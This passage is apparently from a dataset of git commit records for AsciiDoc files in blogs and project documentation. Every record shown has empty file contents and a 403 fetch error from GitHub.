2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","new_file":"_posts\/2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc3f9f2b70f300d4ad741500f269fa6e58d9c56","subject":"Update 2016-08-31-No-Victory-Over-Hugo.adoc","message":"Update 2016-08-31-No-Victory-Over-Hugo.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-31-No-Victory-Over-Hugo.adoc","new_file":"_posts\/2016-08-31-No-Victory-Over-Hugo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdd000a3ef01c308895743b2e624f9db11c95990","subject":"Update 2018-01-29-Artifactory-Research.adoc","message":"Update 2018-01-29-Artifactory-Research.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-29-Artifactory-Research.adoc","new_file":"_posts\/2018-01-29-Artifactory-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa028965cb42a4850cd826da9d66a1224688f8b3","subject":"Update 2015-12-13-11-10-Bitmask-usage-Part-2.adoc","message":"Update 2015-12-13-11-10-Bitmask-usage-Part-2.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-12-13-11-10-Bitmask-usage-Part-2.adoc","new_file":"_posts\/2015-12-13-11-10-Bitmask-usage-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e943a0bfbdb698df7517b1fa9aa3f9fb0c01b7c4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63d9c9a69653272a9c3cda0062dff8c23edd0d05","subject":"Update 2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","message":"Update 2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","new_file":"_posts\/2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42cc410fe1651aee8e3415c578cc17cdb2c84133","subject":"Add new webinar article","message":"Add new webinar article\n","repos":"stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2013-11-21-WildFly-8-Webinar.adoc","new_file":"news\/2013-11-21-WildFly-8-Webinar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"26569507f7f0e97a3c072b6ae83f6bd0912b6284","subject":"Update 2016-02-05-Hello.adoc","message":"Update 2016-02-05-Hello.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Hello.adoc","new_file":"_posts\/2016-02-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"396ade716e72b5dfa5659940230830e69b2cf66c","subject":"Update 2016-07-20-vimer.adoc","message":"Update 2016-07-20-vimer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vimer.adoc","new_file":"_posts\/2016-07-20-vimer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0836207af90f484920d06fedc0d60e8ecee5cce5","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"930cad97ebd9b9622c28c1ca1c1a846c9131839c","subject":"y2b create post Black Ops 2 GIVEAWAY UPDATE!","message":"y2b create post Black Ops 2 GIVEAWAY UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-02-Black-Ops-2-GIVEAWAY-UPDATE.adoc","new_file":"_posts\/2012-12-02-Black-Ops-2-GIVEAWAY-UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7576796e7601af169fdd0f1c4109ca7861dd6de","subject":"Update 2016-07-20-Introduction-to-Programming.adoc","message":"Update 2016-07-20-Introduction-to-Programming.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-20-Introduction-to-Programming.adoc","new_file":"_posts\/2016-07-20-Introduction-to-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5118c3fd3f802fca09f1bb2e29389ef3e569b8a5","subject":"Update 2016-11-19-CSAA.adoc","message":"Update 2016-11-19-CSAA.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-11-19-CSAA.adoc","new_file":"_posts\/2016-11-19-CSAA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fc3772c1af3050c23e8f073e7cc7e65fd2b669b","subject":"Update 2019-01-31-Test.adoc","message":"Update 2019-01-31-Test.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-Test.adoc","new_file":"_posts\/2019-01-31-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bb2986dfb2dc14cf4d5fcb6c779ec5c0f5aa1a","subject":"Update 2017-10-18-Docker-Commands.adoc","message":"Update 2017-10-18-Docker-Commands.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-18-Docker-Commands.adoc","new_file":"_posts\/2017-10-18-Docker-Commands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2103ad791dbb75c2393f9a4add5901bb18cfdcbe","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b8cd5244bddb3e12626fca26bb1608430702d11","subject":"add clojure survey 2019 post","message":"add clojure survey 2019 post\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2019\/02\/04\/state-of-clojure-2019.adoc","new_file":"content\/news\/2019\/02\/04\/state-of-clojure-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"815c56b6770cb9a4b1a58dd831655cd312df09b6","subject":"Fix an inaccuracy in the dynamic templates documentation. (#32890)","message":"Fix an inaccuracy in the dynamic templates documentation. (#32890)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/mapping\/dynamic\/templates.asciidoc","new_file":"docs\/reference\/mapping\/dynamic\/templates.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57527d179d1adbb0cb355708d8b052b8d09725cc","subject":"started documenting the internals of portal implementation","message":"started documenting the internals of portal implementation\n\nChange-Id: If19a487ac128606dde8531daa8e529af3c17d602\n","repos":"8l\/connectal,hanw\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,hanw\/connectal,csail-csg\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,8l\/connectal,hanw\/connectal,chenm001\/connectal,csail-csg\/connectal,chenm001\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,cambridgehackers\/connectal,8l\/connectal,cambridgehackers\/connectal,hanw\/connectal,8l\/connectal,8l\/connectal,cambridgehackers\/connectal,chenm001\/connectal,csail-csg\/connectal","old_file":"doc\/portalstructure.asciidoc","new_file":"doc\/portalstructure.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e06e6bcf11877664a9294333bdf62334bb9edd6e","subject":"[DOC] Fix typo","message":"[DOC] Fix typo\n","repos":"costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93edc7219b2818430c8b100377d27c719585b363","subject":"[DOC] Add section on push-down support for Spark 1.3+","message":"[DOC] Add section on push-down support for Spark 1.3+\n\nrelates #461\n","repos":"xjrk58\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acf02fc754575b83b796ac77a2ae91adcbc7c3d","subject":"[DOC] Update push down section in Spark","message":"[DOC] Update push down section in Spark\n","repos":"girirajsharma\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd50ac00132d58e1097e0d84ffe46e6d307e8552","subject":"Deleted 2017-02-25adoc.adoc","message":"Deleted 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5263ee267cf2990adf80ed50b9b8dd9a0cc67857","subject":"SonarCloud to Maven: tree to blob","message":"SonarCloud to Maven: tree to blob\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/SonarCloud.adoc","new_file":"Dev tools\/SonarCloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6efe1e962eef4346ce31378b2a12c5bcf91dbed9","subject":"Alpha3 release blog.","message":"Alpha3 release blog.\n","repos":"stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2015-06-17-WildFly-Swarm-Alpha3-Released.adoc","new_file":"news\/2015-06-17-WildFly-Swarm-Alpha3-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93dceebefa186bf2ddd270a6ea27606327c6bdbf","subject":"y2b create post 3 Cool iPhone Gadgets!","message":"y2b create post 3 Cool iPhone Gadgets!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-25-3-Cool-iPhone-Gadgets.adoc","new_file":"_posts\/2016-08-25-3-Cool-iPhone-Gadgets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2f6c72ca8bd9ce0ab105f6f6113d81b120c641","subject":"Update 2017-07-13-C-S-S-Rhythmic-Sizing.adoc","message":"Update 2017-07-13-C-S-S-Rhythmic-Sizing.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-13-C-S-S-Rhythmic-Sizing.adoc","new_file":"_posts\/2017-07-13-C-S-S-Rhythmic-Sizing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d966bbd655facf353c2aa0a09b421cab23a1bc","subject":"y2b create post The Razor-Thin Convertible Laptop","message":"y2b create post The Razor-Thin Convertible Laptop","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-09-The-RazorThin-Convertible-Laptop.adoc","new_file":"_posts\/2017-01-09-The-RazorThin-Convertible-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dc2f79fba90668229f64a33a6804b98ee61fe95","subject":"Update 2017-01-27-Programing-Architecture-And-Math.adoc","message":"Update 2017-01-27-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3de2a017cb7318ed0a58165ed4ef957dbcccc1d","subject":"Update 2016-12-01-Test.adoc","message":"Update 2016-12-01-Test.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Test.adoc","new_file":"_posts\/2016-12-01-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63416732f3ca9fe217a37053c28c4a60ca9eff38","subject":"Update 2018-10-21-O0-P.adoc","message":"Update 2018-10-21-O0-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-O0-P.adoc","new_file":"_posts\/2018-10-21-O0-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af6da602589c4330d15400c46c4b607393322f83","subject":"Reword fmap documentation","message":"Reword fmap documentation\n\nrefs #22\n","repos":"yurrriq\/cats,alesguzik\/cats,mccraigmccraig\/cats,tcsavage\/cats,funcool\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a42de61dc4cafbaae397498e5b78d8912a48daf7","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"mrcouthy\/mrcouthy.github.io,fasigpt\/fasigpt.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,Zatttch\/zatttch.github.io,theblankpages\/theblankpages.github.io,angilent\/angilent.github.io,carsnwd\/carsnwd.github.io,kzmenet\/kzmenet.github.io,maurodx\/maurodx.github.io,peter-lawrey\/peter-lawrey.github.io,Mentaxification\/Mentaxification.github.io,patricekrakow\/patricekrakow.github.io,djmdata\/djmdata.github.io,eduardo76609\/eduardo76609.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,jblemee\/jblemee.github.io,IndianLibertarians\/indianlibertarians.github.io,MichaelIT\/MichaelIT.github.io,lovian\/lovian.github.io,dvbnrg\/dvbnrg.github.io,gongxiancao\/gongxiancao.github.io,sskorol\/sskorol.github.io,yahussain\/yahussain.github.io,14FRS851\/14FRS851.github.io,CreditCardsCom\/creditcardscom.github.io,jonathandmoore\/jonathandmoore.github.io,thockenb\/thockenb.github.io,topicusonderwijs\/topicusonderwijs.github.io,bithunshal\/shalsblog,netrunnerX\/netrunnerx.github.io,tosun-si\/tosun-si.github.io,remi-hernandez\/remi-hernandez.github.io,somosazucar\/centroslibres,jblemee\/jblemee.github.io,lerzegov\/lerzegov.github.io,xavierdono\/xavierdono.github.io,timyklam\/timyklam.github.io,reggert\/reggert.github.io,htapia\/htapia.github.io,Driven-Development\/Driven-Development.github.io,ahopkins\/amhopkins.com,anwfr\/blog.anw.fr,chbailly\/chbailly.github.io,plaidshirtguy\/plaidshirtguy.github.io,jkschneider\/jkschneider.github.io,heliomsolivas\/heliomsolivas.github.io,furcon\/furcon.github.io,datumrich\/datumrich.github.io,topranks\/topranks.github.io,jblemee\/jblemee.github.io,ennerf\/ennerf.github.io,HubPress\/hubpress.io,kzmenet\/kzmenet.github.io,buliaoyin\/buliaoyin.github.io,javathought\/javathought.github.io,Roen00\/roen00.github.io,bbsome\/bbsome.github.io,velo\/velo.github.io,drankush\/drankush.github.io,egorlitvinenko\/egorlitvinenko.github.io,netrunnerX\/netrunnerx.github.io,InformatiQ\/informatiq.github.io,txemis\/txemis.github.io,alimasyhur\/alimasyhur.github.io,hirako2000\/hirako2000.github.io,chaseey\/chaseey.github.io,mahrocks\/mahrocks.github.io,camilo28\/camilo28.github.io,mikealdo\/mikealdo.github.io,theofilis\/theofilis.github.io,OctavioMaia\/octaviomaia.github.io,dannylane\/dannylane.github.io,mager19\/mager19.github.io,demo-hubpress\/demo,icthieves\/icthieves.github.io,maurodx\/maurodx.github.io,FilipLaz\/filiplaz.github.io,TelfordLab\/telfordlab.github.io,soyabeen\/soyabeen.github.io,mattburnin\/hubpress.io,ricardozanini\/ricardozanini.github.io,2wce\/2wce.github.io,rushil-patel\/rushil-patel.github.io,lyqiangmny\/lyqiangmny.github.io,bitcowboy\/bitcowboy.github.io,alphaskade\/alphaskade.github.io,jbrizio\/jbrizio.github.io,siarlex\/siarlex.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,thrasos\/thrasos.github.io,InformatiQ\/informatiq.github.io,polarbill\/polarbill.github.io,johannewinwood\/johannewinwood.github.io,LearningTools\/LearningTools.github.io,darsto\/darsto.github.io,atfd\/hubpress.io,fuhrerscene\/fuhrerscene.github.io,iolabailey\/iolabailey.github.io,gongxiancao\/gongxiancao.github.io,xvin3t\/xvin3t.github.io,jborichevskiy\/jborichevskiy.github.io,deformat\/deformat.github.io,ElteHupkes\/eltehupkes.github.io,tedbergeron\/hubpress.io,justafool5\/justafool5.github.io,fbruch\/fbruch.github.com,bencekiraly\/bencekiraly.github.io,laposheureux\/laposheureux.github.io,s-f-ek971\/s-f-ek971.github.io,timyklam\/timyklam.github.io,roamarox\/roamarox.github.io,apalkoff\/apalkoff.github.io,itsallanillusion\/itsallanillusion.github.io,sinemaga\/sinemaga.github.io,live-smart\/live-smart.github.io,OctavioMaia\/octaviomaia.github.io,3991\/3991.github.io,zubrx\/zubrx.github.io,pdudits\/pdudits.github.io,ennerf\/ennerf.github.io,crisgoncalves\/crisgoncalves.github.io,indusbox\/indusbox.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,endymion64\/endymion64.github.io,ntfnd\/ntfnd.github.io,livehua\/livehua.github.io,IdoramNaed\/idoramnaed.github.io,debbiezhu\/debbiezhu.github.io,vba\/vba.github.io,Zatttch\/zatttch.github.io,holtalanm\/holtalanm.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,metasean\/blog,IndianLibertarians\/indianlibertarians.github.io,camilo28\/camilo28.github.io,Brzhk\/Brzhk.github.io,SRTjiawei\/SRTjiawei.github.io,realraindust\/realraindust.github.io,bencekiraly\/bencekiraly.github.io,joescharf\/joescharf.github.io,MartinAhrer\/martinahrer.github.io,blahcadepodcast\/blahcadepodcast.github.io,thrasos\/thrasos.github.io,zhuo2015\/zhuo2015.github.io,jcsirot\/hubpress.io,Bulletninja\/bulletninja.github.io,angilent\/angilent.github.io,amodig\/amodig.github.io,hayyuelha\/technical-blog,hoernschen\/hoernschen.github.io,Easter-Egg\/Easter-Egg.github.io,carlosdelfino\/carlosdelfino-hubpress,dingboopt\/dingboopt.github.io,eduardo76609\/eduardo76609.github.io,CreditCardsCom\/creditcardscom.github.io,cringler\/cringler.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,DullestSaga\/dullestsaga.github.io,scottellis64\/scottellis64.github.io,macchandev\/macchandev.github.io,live-smart\/live-smart.github.io,macchandev\/macchandev.github.io,mahrocks\/mahrocks.github.io,tjfy1992\/tjfy1992.github.io,nickwanhere\/nickwanhere.github.io,chowwin\/chowwin.github.io,kfkelvinng\/kfkelvinng.github.io,dgrizzla\/dgrizzla.github.io,bretonio\/bretonio.github.io,MatanRubin\/MatanRubin.github.io,lmcro\/hubpress.io,roelvs\/roelvs.github.io,raghakot\/raghakot.github.io,alchemistcookbook\/alchemistcookbook.github.io,ovo-6\/ovo-6.github.io,gudhakesa\/gudhakesa.github.io,christianmtr\/christianmtr.github.io,deruelle\/deruelle.github.io,Easter-Egg\/Easter-Egg.github.io,neomobil\/neomobil.g